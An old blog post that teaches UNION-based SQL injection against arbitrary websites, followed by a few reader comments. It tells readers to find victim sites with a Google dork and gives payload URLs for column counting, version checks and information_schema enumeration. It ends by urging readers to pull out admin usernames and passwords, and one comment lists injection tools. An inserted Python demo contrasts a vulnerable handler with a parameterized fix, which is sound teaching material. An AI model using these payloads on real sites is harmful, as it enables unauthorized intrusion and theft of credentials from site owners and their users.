
How to perform a SQL injection?

First of all we must know what a 'SQL injection' is. Here is the Wikipedia definition: 'SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application'. Here we will confine ourselves to SQL injection in web sites.

Now we need to find a site link that is likely to be vulnerable. Most probably it will be of the form 'http://www.site.com/abc.php?id=5', i.e. a page that takes a value from the URL and puts it straight into a database query. If you haven't got such a link, just search Google for 'allinurl:.php?*id' and pick a result.

1. Check the vulnerability by adding ' to the above link.

If you get a database error message, the single quote has broken the SQL syntax, which means the parameter is being pasted into the query without escaping. Now you can be damn sure that the site is vulnerable to SQL injection.

2. Find out the number of columns

To find the number of columns we use ORDER BY.

Just increment the number until we get an error.

http://www.site.com/abc.php?id=5 order by 1-- <-- no error

http://www.site.com/abc.php?id=5 order by 2-- <-- no error

http://www.site.com/abc.php?id=5 order by 3-- <-- no error

http://www.site.com/abc.php?id=5 order by 4-- <-- ERROR (we get some message like Unknown column '4')

So we can conclude that the query selects 3 columns: the highest ORDER BY value that did not error.

3. Check whether UNION works

http://www.site.com/abc.php?id=5 union all select 1,2,3--

One of the numbers will appear on the page, which tells us which column is displayed. Let's say we get the number 2 at this step.

4. Check the MySQL version by replacing the 2 from the above step with version()

http://www.site.com/abc.php?id=5 union all select 1,version(),3--

Now you can read the version off the page, and only if it is 5 or above can we continue to the next steps.

// If the version is lower than 5, we will have to adopt some other methods, which I will explain in a future post //

5. Use information_schema

Why do we use information_schema? The reason is very simple: in MySQL 5 and higher versions, information_schema holds the names of all tables and columns in the database.

To get table names we select table_name from information_schema.tables:

http://www.site.com/abc.php?id=5 union all select 1,table_name,3 from information_schema.tables--

6. Now that we have the table and column names, just retrieve the sensitive data like admin users, passwords, etc.
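As an added illustration (not part of the original post), here is a toy version of the abc.php handler from step 1 beside its fixed form, built on an in-memory SQLite database standing in for MySQL (an assumption; the table and column names are constructed for the demo). The vulnerable lookup pastes the id into the SQL text, so the probes from steps 1 to 3 produce errors and extra UNION rows; the hardened lookup binds the id as a query parameter, and the same strings simply match nothing.

```python
import sqlite3

# Constructed stand-in for the site's database (SQLite instead of MySQL; assumption).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT);
        INSERT INTO articles VALUES (5, 'Hello', 'first post');
    """)
    return conn

def vulnerable_lookup(conn, id_param):
    # Mirrors abc.php?id=...: the raw query-string value is pasted into the SQL text,
    # so a quote, an ORDER BY or a UNION SELECT changes the structure of the query.
    sql = "SELECT id, title, body FROM articles WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def hardened_lookup(conn, id_param):
    # The value is bound as a parameter: the driver passes it as data, never as SQL,
    # so the same payloads are compared against the id column and match no row.
    sql = "SELECT id, title, body FROM articles WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()

def probe(lookup, conn, id_param):
    """Run one lookup and report ('rows', count) or ('error', message):
    the error-or-not signal the post reads off the page in steps 1 to 3."""
    try:
        return ("rows", len(lookup(conn, id_param)))
    except sqlite3.DatabaseError as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    conn = make_db()
    for payload in ["5", "5'", "5 order by 3--", "5 order by 4--",
                    "5 union all select 1,2,3--"]:
        print(f"{payload!r:30} vulnerable={probe(vulnerable_lookup, conn, payload)}"
              f"  hardened={probe(hardened_lookup, conn, payload)}")
```

A real handler would additionally cast id to an integer before binding it, but it is the parameter binding, not the cast, that removes the injection.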


  1. ali
    July 7, 2010 at 2:19 am

    Sql injection tools pangolin liqidis havij jsky safe3 m4x Sqlihelper

  2. July 7, 2010 at 2:50 am

    nice info thx man

  3. August 8, 2010 at 9:39 am

    Nice, it is helpful to me, thanks

  4. prabhat
    December 30, 2010 at 12:51 pm

    document.write("hello how are u")

  5. Entropy
    November 28, 2011 at 1:25 am

